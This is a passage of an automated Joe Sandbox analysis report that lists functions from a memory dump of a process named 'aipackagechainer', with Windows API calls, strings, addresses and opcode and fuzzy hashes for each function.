Opcode Fuzzy Hash: 4fbbe103d8695f570f4922be7d0a42f6fbc4010ae9fffe1187245206f54dd44f
Instruction Fuzzy Hash: 5331B775901228ABCB61DF24D889BDDBBB8BF08310F5041EAE41CA6261EB749B858F55

Function 000887A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,D11C52E5), ref: 000887FE

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

Strings

%04d-%02d-%02d %02d-%02d-%02d, xrefs: 00088840

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: HeapLocalProcessTime
String ID: %04d-%02d-%02d %02d-%02d-%02d
API String ID: 1554148984-3768011868
Opcode ID: 8d3f152827bceb175cf959a7cc4313cb32492c11814407d1412636f9304d0056
Instruction ID: 9e1e9597de9ce9f7601d6fc62aac84eb7e6171cdad8360a63f6ad9eb7fda0065
Opcode Fuzzy Hash: 8d3f152827bceb175cf959a7cc4313cb32492c11814407d1412636f9304d0056
Instruction Fuzzy Hash: 4E219AB1D10218AFDB14DF99D941BFEB7F8EB0C710F10422AF951A3281EB789940CBA5

Function 000D2720 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7005f14389522480ac6fb9852cd731dda82be8c916b1cc2d4119a756cf47b29a
Instruction ID: 40d721d5c4e4eeb327bc75bb76efa03af6f0310a6b68fee2a0a9819a74f8d36a
Opcode Fuzzy Hash: 7005f14389522480ac6fb9852cd731dda82be8c916b1cc2d4119a756cf47b29a
Instruction Fuzzy Hash: 46F12E71E012199FDF14CF69C8906ADB7F1FF98324F15826AE915AB381D730AE41CB90

Function 000876D0 Relevance: 3.1, APIs: 2, Instructions: 134windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,D11C52E5,?,?), ref: 0008771B
GetLastError.KERNEL32 ref: 00087725

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AllocateErrorFormatHeapLastMessage
String ID:
API String ID: 4114510652-0
Opcode ID: 42a6968785f8d8abd35a7b3d67caaa5cde02a53994d1edc6a930abb1cca3b262
Instruction ID: 3e19e3d48a025736e504f8cd825b86fb4ab2429fa7ac5f6f96337179b26edd97
Opcode Fuzzy Hash: 42a6968785f8d8abd35a7b3d67caaa5cde02a53994d1edc6a930abb1cca3b262
Instruction Fuzzy Hash: 8241D072A082099BEB14DF98C8057AEB7E4FF44714F24466AE909A7781DBB59A04C790

Function 0006CAC0 Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

__set_se_translator.LIBVCRUNTIME ref: 0006CAC5
SetUnhandledExceptionFilter.KERNEL32(Function_00023D00), ref: 0006CADB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ExceptionFilterUnhandled__set_se_translator
String ID:
API String ID: 2480343447-0
Opcode ID: 321536ee9df13105c3962d59dfaae34b918f535c06135175d2c74d8a8f06f71f
Instruction ID: 76108af79ab8a0998a1eaee11285df749945d8004c0bf4df66221ba5ba73b983
Opcode Fuzzy Hash: 321536ee9df13105c3962d59dfaae34b918f535c06135175d2c74d8a8f06f71f
Instruction Fuzzy Hash: 5CD022B08097C0EBFB24A318EE09B393B833BD1F18F00002CE4860A592C6A13AC4B303

Function 000BC5F0 Relevance: 2.7, Strings: 1, Instructions: 1452COMMON

Download Yara Rule

Strings

P?5w, xrefs: 000BCB8A

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID: P?5w
API String ID: 0-2838385722
Opcode ID: f5a9204329fd8ff0dcc5c263ef7f75e9860b98571dcc2743a63f3565948d549f
Instruction ID: f0202ffc166104400c4400300b70f3e289b1d3ae0fba01b3389fc42aff8b0a0a
Opcode Fuzzy Hash: f5a9204329fd8ff0dcc5c263ef7f75e9860b98571dcc2743a63f3565948d549f
Instruction Fuzzy Hash: 52D24770A00249DFEB24CF68C994BDEBBF4BF49304F1481A9E849AB252D775ED45CB90

Function 000DF57D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000DF578,?,?,00000008,?,?,000EA6A4,00000000), ref: 000DF7AA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: b80a345628458d75d360195d655ae0db95e410529fcd0ce35a36dc8f765b6006
Instruction ID: 1de697ab4dc4106301c81bbf04e3a2724bcb770e676737be6d5a117cea1c6153
Opcode Fuzzy Hash: b80a345628458d75d360195d655ae0db95e410529fcd0ce35a36dc8f765b6006
Instruction Fuzzy Hash: 74B12A3161060ACFD758CF28C486AA47BE0FF05364F25C66AE89ACF3A1C735E991CB50

Function 000BDCB0 Relevance: 1.7, Strings: 1, Instructions: 447COMMON

Download Yara Rule

Strings

@, xrefs: 000BE15D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 114236fd6af3178544d6e5467fe68701d58dded12f64a296398eac602a91e12f
Instruction ID: 4232fc11c8342eb33bd511da6aa01946dc3c8fe2ed5d2cbf576e7e7edbafc104
Opcode Fuzzy Hash: 114236fd6af3178544d6e5467fe68701d58dded12f64a296398eac602a91e12f
Instruction Fuzzy Hash: 3D024F72A083008BC75CCF19D89056BF7E2BFCC314F158A2EF89A97351DB74A955CA86

Function 000CCFE0 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000CCFF6

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e90d4f90cc354f9e1c448353f26ba05857231bc16c64b835d7b36ecb7b1117cc
Instruction ID: c1387771878ad6c77442ef9b9d8056cc712bad19afe55aa262e0d093c8776ce0
Opcode Fuzzy Hash: e90d4f90cc354f9e1c448353f26ba05857231bc16c64b835d7b36ecb7b1117cc
Instruction Fuzzy Hash: BB518CB1E15605AFEB24CF68DC81BAEBBF4FB48310F24806AE405EB291D3749991CF54

Function 000E4329 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ce423ab360820d6fb7ec11cb88dcd02390c8d240c5ff5b936ebbf776735690
Instruction ID: 58daa519ee67c91dc37855cc85c8746b64d2008112a570cc7b50e6c703a0b378
Opcode Fuzzy Hash: 84ce423ab360820d6fb7ec11cb88dcd02390c8d240c5ff5b936ebbf776735690
Instruction Fuzzy Hash: A5310972900219AFDB20DFB9CC85EFBB7BDEB84310F144559F915E7241EA309E408B60

Function 000E6F31 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000E6F85

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d7c45444c49640182b0f7bb68a08d9cba63247ac22d5620c64b351cb6ca6645c
Instruction ID: aeea37a8b634360768620468dbc5c494bab422d36fc872d728566cb2d7d67175
Opcode Fuzzy Hash: d7c45444c49640182b0f7bb68a08d9cba63247ac22d5620c64b351cb6ca6645c
Instruction Fuzzy Hash: 9021B032604246AFDB289B26ED52EBA77E8EF24350B10407BF905E6242EA36ED40C750

Function 000E6BB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F

EnumSystemLocalesW.KERNEL32(000E6CDE,00000001,00000000,?,-00000050,?,000E730F,00000000,?,?,?,00000055,?), ref: 000E6C2A

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b0dbc98b40b06562f3b7cc84a44b67962ec0cb14ca2b0b48aff6aa44498b19b9
Instruction ID: a7334efe8f5edb0451c6c7af13d17ba675a8f24bfe1594428cf0488bc791ed47
Opcode Fuzzy Hash: b0dbc98b40b06562f3b7cc84a44b67962ec0cb14ca2b0b48aff6aa44498b19b9
Instruction Fuzzy Hash: F7114C372007019FDB189F3AD8915BABB91FF94368B15443DE98697B40D772B942C740

Function 000E7160 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,000E6EFA,00000000,00000000,?), ref: 000E718C

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d9970d53ea603c5b370fc28987d6636e566bfbaf394fedd9e0cd2a96019c66aa
Instruction ID: c18f79a9717c3da237d8f602f20f495c1b214a7fab8fb53a203c3bae15896b87
Opcode Fuzzy Hash: d9970d53ea603c5b370fc28987d6636e566bfbaf394fedd9e0cd2a96019c66aa
Instruction Fuzzy Hash: ECF0F932544352AFDB2997AACC46BBAB7A4EB40354F154465EC09B3180EA74FE41C590

Function 000E6AC6 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 000E6B1A

Strings

utf8, xrefs: 000E6A89

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 8be753d2e1da0aedeef32eb531b5be0e5e3b227012624b2df57852d1f3406ce4
Instruction ID: f5ce12a04f254b9bd1102c86fff01d3eb34b9b95ba36c04fe67e9e98bd90a557
Opcode Fuzzy Hash: 8be753d2e1da0aedeef32eb531b5be0e5e3b227012624b2df57852d1f3406ce4
Instruction Fuzzy Hash: 36F0A432600255ABD724AB75DC56EFA33E8DB55310F10407AF506E7281DA78AD058754

Function 000E6C53 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F

EnumSystemLocalesW.KERNEL32(000E6F31,00000001,00000005,?,-00000050,?,000E72D3,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 000E6C9D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 80b3cb9caf0c5fc04c837667cc250fb719d1348732ce0222ab98b24a828f30d8
Instruction ID: aa771418d7dbbe9ea0d258a67d9d40d4a3c592106ee2f58a609814aa9693587b
Opcode Fuzzy Hash: 80b3cb9caf0c5fc04c837667cc250fb719d1348732ce0222ab98b24a828f30d8
Instruction Fuzzy Hash: D2F0F6362003445FDB245F7AE885ABA7BD1EF907A8B15442DF9455B690C672AC42C710

Function 000DD78E Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000D8C5A: EnterCriticalSection.KERNEL32(-001290F8,?,000DA6B8,00000000,00123938,0000000C,000DA67F,?,?,000DDFFD,?,?,000DD487,00000001,00000364,00000000), ref: 000D8C69

EnumSystemLocalesW.KERNEL32(000DD781,00000001,00123B40,0000000C,000DDBD1,00000000), ref: 000DD7C6

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: f5400c9b73ec46a91352498a5a9a277a0c8df079f5ca6b81f4cd8311c7b4053b
Instruction ID: a23baf87e9530c80004a46d3e223b4056e3fa352ea4646899aa20b38e0865c22
Opcode Fuzzy Hash: f5400c9b73ec46a91352498a5a9a277a0c8df079f5ca6b81f4cd8311c7b4053b
Instruction Fuzzy Hash: 64F01476A04304EFE710DFA8E842B997BE0EB48721F10416BF5109B3A1DA7959819B50

Function 000E6B6D Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F

EnumSystemLocalesW.KERNEL32(000E6AC6,00000001,00000005,?,?,000E7331,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 000E6BA4

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 247cd812952b201edfe0dab5b22cdb3fd99114e4c860e0f5f68797143ef2297b
Instruction ID: 84b9a0b4eac5f434ed99238a3d7313a6ccf7a015cffa73d9cf21c5adc0708b8f
Opcode Fuzzy Hash: 247cd812952b201edfe0dab5b22cdb3fd99114e4c860e0f5f68797143ef2297b
Instruction Fuzzy Hash: A2F0E53A3002859BDB049F76E84567ABF94EFD1760B0A405AEA05DB651C6769882CB90

Function 000DDCD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,000DCA29,?,20001004,00000000,00000002,?,?,000DC02B), ref: 000DDD09

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a4bc00efc71d7521862caf793017cab5a6485d43cccf83655e8712b78f56918f
Instruction ID: 17d9fc3ac8ab076c0815132416990f57a1ee0b0a8cbcb53ea72ef7982e9acc2d
Opcode Fuzzy Hash: a4bc00efc71d7521862caf793017cab5a6485d43cccf83655e8712b78f56918f
Instruction Fuzzy Hash: 51E04F31500258BBDF122F61DC04AEE7F1AEF44750F048423FC0566261CB758921EAE1

Function 000CD4E0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0006D4EC,000CCD9E), ref: 000CD4E5

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8078f89faac9370c2d06065bcb66774cbd90d70c6fb3247d52a656dbf01aadfa
Instruction ID: 9322d0430614ca679f1021a3c52e32ba605482bbfcb83f430de548ac60116b49
Opcode Fuzzy Hash: 8078f89faac9370c2d06065bcb66774cbd90d70c6fb3247d52a656dbf01aadfa
Instruction Fuzzy Hash:

Function 00065770 Relevance: .7, Instructions: 682COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ceedcd877297ace21be460c4bafb49acda9923a9bb2321cf2a768867c0e8f16
Instruction ID: ce42bdf8a7641466e1aa091020e34b1bc735817f956ad29add375415a2950bf7
Opcode Fuzzy Hash: 2ceedcd877297ace21be460c4bafb49acda9923a9bb2321cf2a768867c0e8f16
Instruction Fuzzy Hash: A022B4B3B547144BD70CCE1DCCA23A9B2D3ABD4218F0E853DB58AC3345EA7DD9198685

Function 000E13E9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7b47f540f2912c1f24ff1407aeec362b7fec041c948b8901ddefa1a804d27a
Instruction ID: f3971957bc9443f4d589de3a9f2c17401b742614da871890d906b7f79c27c8ac
Opcode Fuzzy Hash: 4f7b47f540f2912c1f24ff1407aeec362b7fec041c948b8901ddefa1a804d27a
